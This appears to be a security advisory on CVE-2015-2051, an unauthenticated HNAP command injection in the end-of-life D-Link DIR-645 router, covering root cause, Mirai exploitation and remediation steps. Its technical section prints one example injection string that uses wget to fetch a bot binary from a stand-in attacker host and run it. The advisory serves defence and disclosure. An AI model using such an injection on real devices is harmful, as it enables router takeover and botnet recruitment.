CVE-2015-2051

What Is the D-Link DIR-645?

The D-Link DIR-645 is a consumer/SOHO wireless router that was widely deployed in homes and small businesses. Like most consumer routers, it runs embedded Linux firmware with a web management interface and exposes a variety of administrative protocols — including HNAP (Home Network Administration Protocol), a SOAP-based management protocol developed by Cisco/Linksys and later adopted by other router vendors.

HNAP is designed to allow centralized management of home network devices and runs on the same HTTP port as the router's web management interface. It processes SOAP XML requests for administrative actions — including device status queries, configuration changes, and diagnostic operations.

Overview

CVE-2015-2051 is a remote code execution vulnerability in the D-Link DIR-645 router's HNAP (Home Network Administration Protocol) interface. A GetDeviceSettings action request passes user-supplied input directly to a system shell command without sanitization, enabling unauthenticated remote attackers to execute arbitrary commands as root. The D-Link DIR-645 is end-of-life with no vendor patch available. The vulnerability has been actively exploited by Mirai and successor IoT botnets since 2016 to enlist consumer routers into DDoS infrastructure.

Affected Versions

No firmware patch was released. The device is end-of-life and should be replaced.

Technical Details

Root Cause: HNAP Command Injection via GetDeviceSettings

The D-Link DIR-645's HNAP interface handles SOAP requests including GetDeviceSettings. The handler for this action extracts a parameter from the SOAP XML request and passes it unsanitized to a system shell command — constructing something equivalent to:

system("cmd " + user_input)

An attacker can inject shell metacharacters (;, |, `, $()) to append arbitrary commands:

; wget http://attacker.com/bot.mips -O /tmp/bot; chmod +x /tmp/bot; /tmp/bot

The result executes as root — the standard privilege level for embedded router firmware processes — giving the attacker full control of the device.

Pre-Authentication Access

The HNAP interface in the DIR-645 is accessible without authentication for certain action types, including the vulnerable action. No username or password is required to send the malicious SOAP request, making this a pre-authentication RCE accessible to any network attacker who can reach the router's management port.

Attack Characteristics

Discovery

Publicly disclosed in early 2015 with a working exploit published to Exploit-DB. The DIR-645 had already been end-of-life for some time at the point of disclosure, and no firmware fix was provided.

Exploitation Context

• Mirai botnet: CVE-2015-2051 is one of a collection of D-Link and consumer router vulnerabilities exploited by Mirai (first observed October 2016) and its numerous variants (Satori, Gafgyt, Mozi, Hajime); the October 2016 Dyn DNS DDoS attack — which took down Twitter, Reddit, Netflix, and other major sites — involved Mirai-infected routers
• Automated internet scanning: Mirai and successor botnets continuously scan the internet for devices with known vulnerabilities including CVE-2015-2051; an unpatched DIR-645 with remote management enabled is likely to be compromised within hours of internet exposure
• Massive installed base: Millions of DIR-645 units were sold; many remain in service in homes and small businesses years after end-of-life, creating a persistent population of vulnerable internet-facing routers
• CISA KEV (2022): Added February 2022

Remediation

1. Replace the device — the D-Link DIR-645 is end-of-life with no available firmware fix. Replace with a currently supported router from a vendor with an active security response program.

2. Disable remote management — if immediate replacement is not possible, disable remote management (WAN-side web interface access) in the router settings to limit exposure to LAN attackers only.

3. Firewall the management interface — block inbound access to TCP 80/443 from the WAN side using an upstream firewall or ISP ACLs.

4. Check for compromise — if the device has been internet-accessible, it may already be enrolled in a botnet. Perform a factory reset and then immediately restrict management access before reconnecting.

5. Network isolation — isolate any remaining D-Link DIR-645 devices on a separate network segment from sensitive systems to limit the impact of compromise.